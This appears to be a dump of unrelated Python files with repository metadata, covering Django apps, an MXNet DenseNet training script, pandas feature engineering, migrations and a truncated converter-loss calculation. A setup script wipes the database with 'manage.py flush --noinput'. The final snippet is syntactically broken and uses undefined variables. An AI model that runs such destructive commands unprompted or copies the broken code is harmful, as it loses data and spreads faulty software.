TRAIN_SIZE = -1 # -1 => train on all
BATCH_SIZE = 256
TRAINABLE = True
# hpc file paths
train_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/train.txt'
val_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/val.txt'
test_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/test.txt'
count_vect_vocab_file = '/home/cse/dual/cs5130275/DERP/Code/Models/LogisticRegBaseline/vocab_50k'
save_model_path = '/scratch/cse/dual/cs5130275/DERP/Models/GRU_Ctxt_GRU_Resp_NoGold/' + 'CTXT_HIDDEN_STATE_' + str(CTXT_GRU_HIDDEN_STATE) + '_RESP_HIDDEN_STATE_' + str(RESP_GRU_HIDDEN_STATE) + '_VOCAB_SIZE_' + str(VOCAB_SIZE) + '_MAX_RESP_LEN_' + str(MAX_RESP_LEN) + '_EMBEDDING_DIM_' + str(EMBEDDING_DIM) + '_DENSE_HIDDEN_STATE_' + str(DENSE_HIDDEN_STATE) + '_DROPOUT_' + str(DROPOUT) + '_BATCH_SIZE_' + str(BATCH_SIZE) + '_attn'
# load_model_path = ''
load_model_path = '/scratch/cse/dual/cs5130275/DERP/Models/GRU_Ctxt_GRU_Resp_NoGold/CTXT_HIDDEN_STATE_512_RESP_HIDDEN_STATE_300_VOCAB_SIZE_50000_MAX_RESP_LEN_50_EMBEDDING_DIM_300_DENSE_HIDDEN_STATE_100_DROPOUT_0.3_BATCH_SIZE_256_attn_on_epoch_59.weights'
save_pred_path = '/home/cse/dual/cs5130275/DERP/Code/Models/GRU_Ctxt_GRU_Resp_NoGold/attn500'
|
[
"akshay.akgupta@gmail.com"
] |
akshay.akgupta@gmail.com
|
770cde652a542daab0f2fd55ae29d6854a5d0c70
|
782d5ae9fad0ff98518afca1ef1eee97574f3a9e
|
/getbizy_project/getbizy_project/getbizy_project/urls.py
|
e8693ee49a367a147e7b5c2df5853dbc95dd49d2
|
[
"MIT"
] |
permissive
|
bbrock25/getbizy
|
6eeb4406cbe225dc4b83a0f6ab0715c3ab6b7717
|
4889cd1e4199023e8fa2b2b3afb35239cfd27ca0
|
refs/heads/master
| 2020-12-25T17:26:38.103584
| 2014-06-01T21:33:31
| 2014-06-01T21:33:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.conf import settings
from django.views.generic import TemplateView

# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()

urlpatterns = patterns('',
    #url(r'^$', TemplateView.as_view(template_name='base.html')),
    url(r'', include('social_auth.urls')),
    url(r'^$', 'social.views.home', name='home'),
    url(r'^my-profile/', 'social.views.my_profile', name='my-profile'),
    url(r'^edit-profile/', 'social.views.edit_profile', name='edit-profile'),
    url(r'^edit-account/', 'social.views.edit_account', name='edit-account'),
    url(r'^view-user/', 'social.views.view_user', name='view-user'),
    url(r'^logout/', 'social.views.logout', name='logout'),
    url(r'^admin/', include(admin.site.urls)),
)

# Uncomment the next line to serve media files in dev.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

if settings.DEBUG:
    import debug_toolbar
    urlpatterns += patterns('',
        url(r'^__debug__/', include(debug_toolbar.urls)),
    )
|
[
"bbrock@Bills-MacBook-Pro.local"
] |
bbrock@Bills-MacBook-Pro.local
|
2bac3e251e0b444b1519fc0bc91ee5f46aa5542b
|
e408837d2242f9ca17259e165566cbabc3ea6645
|
/MXNetChapter4/DenseNet.py
|
6535288288ba12b425354e6c31c0707f61c7bb5c
|
[] |
no_license
|
TriLoo/c_algorithm
|
f885aab15d9fd728e023e527fa0d1cf12a4ce284
|
5fe60b830b352a2fa5a78c4517ae20cb16d36557
|
refs/heads/master
| 2021-01-13T08:43:01.153175
| 2020-11-15T13:43:24
| 2020-11-15T13:43:24
| 82,043,035
| 5
| 1
| null | 2017-02-20T11:13:06
| 2017-02-15T09:26:42
| null |
UTF-8
|
Python
| false
| false
| 2,459
|
py
|
from mxnet import gluon
from mxnet import nd
from mxnet.gluon import nn
import utils
from mxnet import init
import mxnet as mx


def conv_block(channels):
    out = nn.Sequential()
    out.add(
        nn.BatchNorm(),
        nn.Activation('relu'),
        nn.Conv2D(channels, kernel_size=3, padding=1)
    )
    return out


class DenseBlock(nn.Block):
    def __init__(self, layers, growth_rate, **kwargs):
        super(DenseBlock, self).__init__(**kwargs)
        self.net = nn.Sequential()
        for i in range(layers):
            self.net.add(conv_block(growth_rate))

    def forward(self, x):
        for layers in self.net:
            out = layers(x)
            x = nd.concat(x, out, dim=1)
        return x


dblk = DenseBlock(2, 10)
dblk.initialize()
x = nd.random_uniform(shape=(4, 3, 8, 8))
print(dblk(x).shape)


# Transition Block
def transition_block(channels):
    out = nn.Sequential()
    out.add(
        nn.BatchNorm(),
        nn.Activation('relu'),
        nn.Conv2D(channels, kernel_size=1),
        nn.AvgPool2D(pool_size=2, strides=2)
    )
    return out


tblk = transition_block(10)
tblk.initialize()
print(tblk(x).shape)

# define DenseNet
init_channels = 64
growth_rate = 32
block_layers = [6, 12, 24, 16]
num_classes = 10


def dense_net():
    net = nn.Sequential()
    with net.name_scope():
        net.add(
            nn.Conv2D(init_channels, kernel_size=7, strides=2, padding=3),
            nn.BatchNorm(),
            nn.Activation('relu'),
            nn.MaxPool2D(pool_size=3, strides=2, padding=1)
        )
        # dense block
        channels = init_channels
        for i, layer in enumerate(block_layers):
            net.add(DenseBlock(layer, growth_rate))
            channels += layer * growth_rate
            if i != len(block_layers) - 1:
                net.add(transition_block(channels // 2))
        # last block
        net.add(
            nn.BatchNorm(),
            nn.Activation('relu'),
            nn.AvgPool2D(pool_size=1),
            nn.Flatten(),
            nn.Dense(num_classes)
        )
    return net


train_data, test_data = utils.load_data_fashion_mnist(batch_size=64, resize=32)
net = dense_net()
net.initialize(init=init.Xavier())
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': 0.1})
print("start training...")
utils.train(train_data, test_data, net, loss, trainer, ctx=mx.cpu(), num_epochs=1)
|
[
"song_mh@yeah.net"
] |
song_mh@yeah.net
|
5d2aee020a2f30f6bfef89bf80f619282966bf4a
|
8fdf8b3a99b80429c74c977a63595b156c849471
|
/pre_proc/trans_csv.py
|
f54e46cbc2c2519a79c1c3fa326708dc3a487b05
|
[] |
no_license
|
swfxliyiyu/pre_cvr
|
0c48beae6eb2b14f73cd50cf7e0568c1985e57cc
|
3775d157e8052cd552cce10ae241b6006b54d86a
|
refs/heads/master
| 2020-03-09T00:55:51.135784
| 2018-04-02T09:23:46
| 2018-04-02T09:23:46
| 128,500,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,204
|
py
|
import pandas as pd
from pandas.core.groupby import SeriesGroupBy
from sklearn.preprocessing import StandardScaler, MultiLabelBinarizer
import numpy as np
from collections import defaultdict
com = ['instance_id', 'is_trade']
TR_PATH = '../data/train_tc.csv'
TE_PATH = '../data/test_tc.csv'
cate_feats = {1: 'hour', 2: 'item_city_id', 3: 'item_price_level', 4: 'item_sales_level',
5: 'item_collected_level', 6: 'item_pv_level', 7: 'item_category_list', 8: 'user_gender_id',
9: 'user_age_level', 10: 'user_occupation_id', 11: 'user_star_level', 12: 'shop_review_num_level',
13: 'shop_star_level', 14: 'day', 15: 'item_brand_id', 16: 'shop_id', 17: 'item_id'}
num_feats = {1: 'shop_review_positive_rate', 2: 'shop_score_service', 3: 'shop_score_delivery',
4: 'shop_score_description'}
tr_data = pd.read_csv("../data/round1_ijcai_18_train_20180301.txt", sep=' ').sort_values(['context_timestamp'],
kind='heapsort')
te_data = pd.read_csv("../data/round1_ijcai_18_test_a_20180301.txt", sep=' ')
te_data['is_trade'] = 0
# Prepare the results to be written out
tr_out = pd.DataFrame()
te_out = pd.DataFrame()
# Label and Id columns
tr_out[['Id', 'Label']] = tr_data[com]
te_out[['Id', 'Label']] = te_data[com]
# Time features
tr_data['date'] = tr_data['context_timestamp'].apply(lambda stamp: pd.datetime.utcfromtimestamp(stamp))
te_data['date'] = te_data['context_timestamp'].apply(lambda stamp: pd.datetime.utcfromtimestamp(stamp))
tr_data['day_hour'] = tr_data['date'].apply(lambda date: date.strftime('%d-%H'))
te_data['day_hour'] = te_data['date'].apply(lambda date: date.strftime('%d-%H'))
tr_data['day'] = tr_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[0])
te_data['day'] = '24'  # treat the test set as the last day
tr_data['hour'] = tr_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[1])
te_data['hour'] = te_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[1])
# Click volume within the hour
# tr_data['click_hour'] = tr_data['day_hour'].replace(tr_data.groupby(['day_hour'])['is_trade'].count())
# te_data['click_hour'] = te_data['day_hour'].replace(te_data.groupby(['day_hour'])['is_trade'].count()) / 0.3
mlb = MultiLabelBinarizer()
def fuc(ele):
res = []
lst = ele.split(';')
for i in lst:
if i in dic:
res.append(i)
return res
# Category information
dic = defaultdict(lambda: 0)
tr_cates = map(lambda ele: ele.split(';'), tr_data['item_category_list'])
for props in tr_cates:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 1000:
dic.pop(k)
print(len(dic))
tr_cates = map(fuc, tr_data['item_category_list'])
tr_cates = mlb.fit_transform(tr_cates)
te_cates = map(fuc, te_data['item_category_list'])
te_cates = mlb.transform(te_cates)
# Property information
dic = defaultdict(lambda: 0)
tr_props = map(lambda ele: ele.split(';'), tr_data['item_property_list'])
for props in tr_props:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 12000:
dic.pop(k)
print(len(dic))
tr_props = map(fuc, tr_data['item_property_list'])
tr_props = mlb.fit_transform(tr_props)
te_props = map(fuc, te_data['item_property_list'])
te_props = mlb.transform(te_props)
# Prediction information
dic = defaultdict(lambda: 0)
tr_pred = map(lambda ele: ele.split(';'), tr_data['predict_category_property'])
for props in tr_pred:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 12000:
dic.pop(k)
print(len(dic))
tr_pred = map(fuc, tr_data['predict_category_property'])
tr_pred = mlb.fit_transform(tr_pred)
te_pred = map(fuc, te_data['predict_category_property'])
te_pred = mlb.transform(te_pred)
# Merge the information above
tr_info = np.concatenate((tr_cates, tr_props, tr_pred), axis=1)
te_info = np.concatenate((te_cates, te_props, te_pred), axis=1)
c_names = list(map(lambda i: 'I'+str(i), range(len(num_feats) + 1, len(num_feats) + 1 + tr_info.shape[1])))
print('Start converting categorical features...')
for i, feat in cate_feats.items():
    print('Converting feature: {}'.format(feat))
val_count = tr_data[feat].value_counts()
val_count[val_count < 1000] = '-9999'
if val_count.dtype != 'object':
        print('This feature will be cast from int to object...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out['C{}'.format(i)] = tr_data[feat].replace(val_count)
te_out['C{}'.format(i)] = te_data[feat].replace(val_count)
print('Start converting numeric features...')
c_size = len(cate_feats)
for i, feat in num_feats.items():
    print('Converting feature: {}'.format(feat))
tr_data[feat] = tr_data[feat].astype('float')
te_data[feat] = te_data[feat].astype('float')
std = np.std(tr_data[feat])
tr_out['C{}'.format(i + c_size)] = 10 * (tr_data[feat] - tr_data[feat].mean()) / std
    te_out['C{}'.format(i + c_size)] = 10 * (te_data[feat] - tr_data[feat].mean()) / std  # use the training-set mean and std
tr_out['C{}'.format(i + c_size)] = tr_out['C{}'.format(i + c_size)].astype('int')
te_out['C{}'.format(i + c_size)] = te_out['C{}'.format(i + c_size)].astype('int')
tr_out['I{}'.format(i)] = tr_data[feat]
te_out['I{}'.format(i)] = te_data[feat]
# tr_out['C{}'.format(i+c_size)] = tr_out['I{}'.format(i)].apply(lambda s: str(s)[:min(len(str(s)), 4)])
# te_out['C{}'.format(i+c_size)] = te_out['I{}'.format(i)].apply(lambda s: str(s)[:min(len(str(s)), 4)])
val_count = tr_out['C{}'.format(i + c_size)].value_counts()
val_count[val_count < 1000] = '-9999'
if val_count.dtype != 'object':
        print('This feature will be cast from int to object...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out['C{}'.format(i + c_size)] = tr_out['C{}'.format(i + c_size)].replace(val_count)
te_out['C{}'.format(i + c_size)] = te_out['C{}'.format(i + c_size)].replace(val_count)
# Extra processing
n_size = len(num_feats)
tr_out['I{}'.format(1 + n_size)] = tr_data['day']
te_out['I{}'.format(1 + n_size)] = te_data['day']
for feat in tr_out:
    if feat in ['C15', 'C16', 'C17']:  # ID features
val_count = tr_out[feat].value_counts()
val_count[val_count < 3000] = '-9999'
if val_count.dtype != 'object':
            print('This feature will be cast from int to object...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out[feat] = tr_out[feat].replace(val_count)
te_out[feat] = te_out[feat].replace(val_count)
# Concatenate the category/property feature matrices
print(te_out.shape)
print(te_info.shape)
print(tr_info.shape)
print(te_info.shape)
print(len(c_names))
tr_info = pd.DataFrame(tr_info, index=tr_out.index, columns=c_names)
te_info = pd.DataFrame(te_info, index=te_out.index, columns=c_names)
tr_out = pd.concat((tr_out, tr_info), axis=1)
te_out = pd.concat((te_out, te_info), axis=1)
tr_out.astype('object').to_csv(TR_PATH, index=False)
te_out.astype('object').to_csv(TE_PATH, index=False)
|
[
"yiyuli233@gmail.com"
] |
yiyuli233@gmail.com
|
08a4e3fb57ed130981c8e79f2b1cad54958f305a
|
cb2aef5f7575a3d3c4bb8187e79b3905494e36c5
|
/project1/WhatDidYouEat/migrations/0003_content_image.py
|
2d10adbd8628abff6cb52e31bbb0a6088908593c
|
[] |
no_license
|
jisun-16/mysite_jisun
|
ec585c650e20f408ee6750965b48d99de8ca90a2
|
d5a4392bab1e8fb599e828fe60b118046fa152f6
|
refs/heads/master
| 2022-08-16T21:23:28.271592
| 2020-05-25T12:55:24
| 2020-05-25T12:55:24
| 254,623,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Generated by Django 3.0.5 on 2020-05-25 12:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('WhatDidYouEat', '0002_comment'),
]
operations = [
migrations.AddField(
model_name='content',
name='image',
field=models.ImageField(blank=True, upload_to='images/'),
),
]
|
[
"limjisun97@naver.com"
] |
limjisun97@naver.com
|
c2c8ecf7b47f6b2ed06b6019cf762f5c42bb12f3
|
7cbf72100d8d4c7e6bd9a04996f7703e77653f57
|
/src/quicksetup.py
|
9d93d4b024783a54bf75ef3440f74149d755492e
|
[] |
no_license
|
BKitor/HangoverGame
|
ea772b4812fc39fb5986f74510a99be5219f3c99
|
ce00ab61bc133f6baab1f094d7f72786ed73ce4b
|
refs/heads/master
| 2021-06-19T21:30:40.490455
| 2020-06-17T17:30:22
| 2020-06-17T17:30:22
| 209,633,155
| 1
| 0
| null | 2021-06-10T19:39:15
| 2019-09-19T19:28:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
import os
import sys
import requests
print(sys.argv)
host_url = "192.168.1.30"
if len(sys.argv) > 1:
host_url = sys.argv[1]
os.system("python manage.py flush --noinput")
user = requests.post(f"http://{host_url}:8000/users/create/", json={
"email": "test@test.test",
"username": "test",
"first_name": "test",
"last_name": "test",
"password": "test",
"date_joined": "2019-10-20T00:00",
"last_joined": "2019-10-20T00:00",
}).json()
questions = []
for i in range(0, 3):
res = requests.post(f"http://{host_url}:8000/api/questions", json={"prompt": f"test_question{i}"}, )
questions.append(res.json()['uuid'])
quiz = requests.post(f"http://{host_url}:8000/api/quizzes", json={
"name": "test_quiz",
"author": user["id"],
"questions": []
}).json()
quiz = requests.put(f"http://{host_url}:8000/api/quizzes", json={
"uuid": quiz['uuid'],
'questions': questions
}).json()
game = requests.post(f"http://{host_url}:8000/api/games", json={
"game_name": "g",
"quiz_uuid": quiz['uuid'],
"host_uuid": user['id'],
}).json()
|
[
"bkitor@gmail.com"
] |
bkitor@gmail.com
|
33be66bdba922fe48cca88e547513a8effdd081e
|
39c81fdff397915b8682c53475d884cae42e9303
|
/solutions/search-insert-position.py
|
a7f180731a84ecb9c2fd39af52f2a27e358641a5
|
[] |
no_license
|
kesavvvvv/leetcode-solutions
|
10c641dbf8b5032974b6f6dded5c47e7ba69581b
|
acbefc1742caa679ba5fffca5e2b28c7d42cc9a5
|
refs/heads/master
| 2022-12-05T19:26:27.852923
| 2020-08-23T15:08:56
| 2020-08-23T15:08:56
| 282,949,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
from typing import List  # needed for the List annotation

class Solution:
    def searchInsert(self, nums: List[int], target: int) -> int:
        # Linear scan for the first value >= target.
        for i, num in enumerate(nums):
            if num >= target:
                return i
        # target exceeds every element; this also covers the empty-list case,
        # where the original `return i + 1` raised a NameError.
        return len(nums)
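# Illustrative checks (added; assume the usual LeetCode harness):
# Solution().searchInsert([1, 3, 5, 6], 5)  -> 2
# Solution().searchInsert([1, 3, 5, 6], 7)  -> 4
# Solution().searchInsert([1, 3, 5, 6], 2)  -> 1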
|
[
"noreply@github.com"
] |
kesavvvvv.noreply@github.com
|
21a30c790e4ad89321c7def95f73d0d06bf93351
|
a3ad75c4e2b0279759a47a55a3ef2450b70b9d39
|
/feedback/admin.py
|
ea8f6b8f0fcf8f5eecfc6e7fe6976055208a65ee
|
[] |
no_license
|
RihardXXX/shop
|
bc4abf34cb4a547fc8cf110ff4a7a02ec1808ffc
|
769438c28180cc6f7e016877c62869eb8d05c4d9
|
refs/heads/master
| 2020-12-09T10:31:05.400948
| 2020-02-17T22:16:22
| 2020-02-17T22:16:22
| 233,277,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
from django.contrib import admin
"""Тут прописываем, как будет работать наша админ панель нашего приложения"""
"""Импортируем Класс Категори из файла модели"""
from .models import Feedback
"""Регистрируем наш класс модель для управления в админ части сайта"""
admin.site.register(Feedback)
|
[
"yusupa.akaeva@yandex.ru"
] |
yusupa.akaeva@yandex.ru
|
e8c17eea74c5ea748252a4fd75b1032006313127
|
420631859f760328336172919a7c9228bb903252
|
/settings_model/migrations/0001_initial.py
|
a8da7c6e358438f13e03e8503b217f8de20baa88
|
[
"MIT"
] |
permissive
|
gregschmit/django-settings-model
|
6067da65bbb3f936ae6a60e492fdd7c73d75fc68
|
ba8e3302291f367247624dbf47a9d70ceaa4ef8f
|
refs/heads/master
| 2020-08-21T11:51:34.184072
| 2019-12-04T03:49:35
| 2019-12-04T03:49:35
| 216,153,680
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
# Generated by Django 2.2.4 on 2019-12-04 03:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Settings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"name",
models.CharField(default="Default", max_length=255, unique=True),
),
("is_active", models.BooleanField(default=True)),
("debug_mode", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255)),
("append_slash", models.BooleanField(default=False)),
(
"allowed_hosts",
models.CharField(
blank=True,
help_text="A comma-delimited list of hosts for which this application is allowed to respond to.",
max_length=255,
),
),
],
options={"verbose_name": "Settings", "verbose_name_plural": "Settings"},
),
]
|
[
"schmitgreg@gmail.com"
] |
schmitgreg@gmail.com
|
20f2fe242806d531fc658c662bc7408d9d8ea68f
|
9e06975b642fefa448b1e92a41c102f3b88a02bf
|
/acubor/core/migrations/0002_auto__add_field_companysetting_lotto_tracking__add_field_companysettin.py
|
1b918883d828b3f0f3e176643e7f577fd1dbd14c
|
[] |
no_license
|
bishnusyangja/Accment-for-Accounting
|
024135548e829fe772552ffcc42d4f292245903b
|
83128d2abd7f92eb58f73b18a9816bd1c1de3549
|
refs/heads/master
| 2021-01-23T08:11:09.935512
| 2015-02-10T03:57:43
| 2015-02-10T03:57:43
| 30,546,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,373
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CompanySetting.lotto_tracking'
db.add_column(u'core_companysetting', 'lotto_tracking',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Adding field 'CompanySetting.inventory_tracking'
db.add_column(u'core_companysetting', 'inventory_tracking',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CompanySetting.lotto_tracking'
db.delete_column(u'core_companysetting', 'lotto_tracking')
# Deleting field 'CompanySetting.inventory_tracking'
db.delete_column(u'core_companysetting', 'inventory_tracking')
models = {
u'core.companysetting': {
'Meta': {'object_name': 'CompanySetting'},
'account_coding': ('django.db.models.fields.CharField', [], {'default': "'Automatic'", 'max_length': '9'}),
'company': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'settings'", 'unique': 'True', 'to': u"orm['users.Company']"}),
'decimal_places': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_tracking': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lotto_tracking': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'number_comma_system': ('django.db.models.fields.CharField', [], {'default': "'120,000'", 'max_length': '8'}),
'region_setting': ('django.db.models.fields.CharField', [], {'default': "'North America'", 'max_length': '15'})
},
u'core.currency': {
'Meta': {'object_name': 'Currency', 'db_table': "'currency'"},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_usd_rate': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.vouchersetting': {
'Meta': {'object_name': 'VoucherSetting'},
'bank_cash_deposit_heading': ('django.db.models.fields.CharField', [], {'default': "'Bank Cash Deposit'", 'max_length': '100'}),
'bank_cash_deposit_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'bank_cash_deposit_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_payment_heading': ('django.db.models.fields.CharField', [], {'default': "'Cash Payment'", 'max_length': '100'}),
'cash_payment_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_payment_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_receipt_heading': ('django.db.models.fields.CharField', [], {'default': "'Cash Receipt'", 'max_length': '100'}),
'cash_receipt_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_receipt_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_deposit_heading': ('django.db.models.fields.CharField', [], {'default': "'Cheque Deposit'", 'max_length': '100'}),
'cheque_deposit_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_deposit_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_payment_heading': ('django.db.models.fields.CharField', [], {'default': "'Cheque Payment'", 'max_length': '100'}),
'company': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voucher_settings'", 'unique': 'True', 'to': u"orm['users.Company']"}),
'eft_in_heading': ('django.db.models.fields.CharField', [], {'default': "'EFT In'", 'max_length': '100'}),
'eft_in_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'eft_in_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'eft_out_heading': ('django.db.models.fields.CharField', [], {'default': "'EFT Out'", 'max_length': '100'}),
'fixed_assets_heading': ('django.db.models.fields.CharField', [], {'default': "'Fixed Assets Voucher'", 'max_length': '100'}),
'fixed_assets_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'fixed_assets_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_heading': ('django.db.models.fields.CharField', [], {'default': "'Invoice'", 'max_length': '100'}),
'invoice_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'invoice_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'journal_voucher_heading': ('django.db.models.fields.CharField', [], {'default': "'Journal Voucher'", 'max_length': '100'}),
'journal_voucher_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'journal_voucher_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'physicalstock_heading': ('django.db.models.fields.CharField', [], {'default': "'Physical Stock Voucher'", 'max_length': '100'}),
'physicalstock_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'physicalstock_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'purchase_voucher_heading': ('django.db.models.fields.CharField', [], {'default': "'Purchase Voucher'", 'max_length': '100'}),
'purchase_voucher_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'purchase_voucher_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'voucher_number_restart_days': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'voucher_number_restart_months': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'voucher_number_restart_years': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'voucher_number_start_date': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 5, 20, 0, 0)'})
},
u'users.company': {
'Meta': {'object_name': 'Company', 'db_table': "u'company'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'type_of_business': ('django.db.models.fields.CharField', [], {'max_length': '254'})
}
}
complete_apps = ['core']
|
[
"bishnusyangja@gmali.com"
] |
bishnusyangja@gmali.com
|
44067309cce2f49327539fe730ae79f746465a87
|
37c9ffb99e509aaa55e911ce400c6a3c9c1fb660
|
/solveforloss.py
|
b36b05c07c6f43cb671669cb0c4ae28d8a70cd9f
|
[] |
no_license
|
c6ishere/dape
|
be3cd5ff2cedcc947f391f59f9abc4aa53da3e96
|
190012b4bff384711802c0e9a7ee800711b723ce
|
refs/heads/master
| 2020-08-16T03:26:49.943357
| 2019-10-16T06:44:04
| 2019-10-16T06:44:04
| 215,448,683
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,613
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 19 21:09:54 2019
@author: c6
"""
import numpy as np
import math
def CalculateDabLoss(um_vec,            # required args moved ahead of the
                     vout_vec,          # defaulted ones: the original order
                     il_vec,            # was a SyntaxError
                     t_vec,
                     r_ds_on_pri = 13e-3,   # r_switch i>0 CAS120M12BM2
                     r_ds_on_sec = 1.5/120, # r_switch i<0 CAS120M12BM2
                     r_trans_pri = 45e-3,
                     r_trans_sec = 45e-3,
                     r_inductor = 22.5e-3,
                     r_capacitor = 22.5e-3,
                     r_pcb_ac = 263e-6,
                     r_pcb_dc = 219e-6,
                     e_sw = 3e-3/600/120,
                     fs = 20e3):        # assumed switching frequency; used below but missing from the original signature
    il_rms = np.sqrt(np.mean(il_vec**2))
    ptr_cond, p_core = CalculateTransformerLoss(il_rms, um_vec, t_vec, fs)
    pl_cond = r_inductor*il_rms*il_rms
    p_pcb_cond = (r_pcb_ac+r_pcb_dc)*il_rms*il_rms
    pc_cond = r_capacitor*il_rms*il_rms
    pswitch_cond = CalculateSwitchConductionLoss(il_vec, vout_vec, t_vec)
    # Assumed: the original never returned a value; summing the component losses.
    return ptr_cond + p_core + pl_cond + p_pcb_cond + pc_cond + pswitch_cond
def CalculateTransformerLoss(il_rms, um_vec, t_vec, fs):  # um_vec, t_vec and fs are used below but were never parameters in the original
# -----------core parameter
k = 1.409
alpha = 1.33
beta = 1.712
n1 = 8
ae = 1160e-6
ki = KiCal(k,alpha,beta,1e-3)
core_np = 5
bs = 0.4
le = 504e-3
ve = 593600e-9
w_core = 30e-3
w_hole = 70e-3
l_core = 5*47e-3-7e-3
h_hole = 126e-3
# -------------winding parameter
d0 = 0.1e-3 # Single strand diameter
dc_single_wire = 4.4e-3 # Single Litz wire diameter
n_single_wire = 1050 # Number of strands in a single wire
wire_np = 10
dc = dc_single_wire*np.sqrt(wire_np*4/math.pi)
n0 = wire_np*n_single_wire
n = n1
m_max = np.floor(w_hole/2/dc_single_wire)
m_min = np.ceil(n*dc/h_hole)
m = m_min
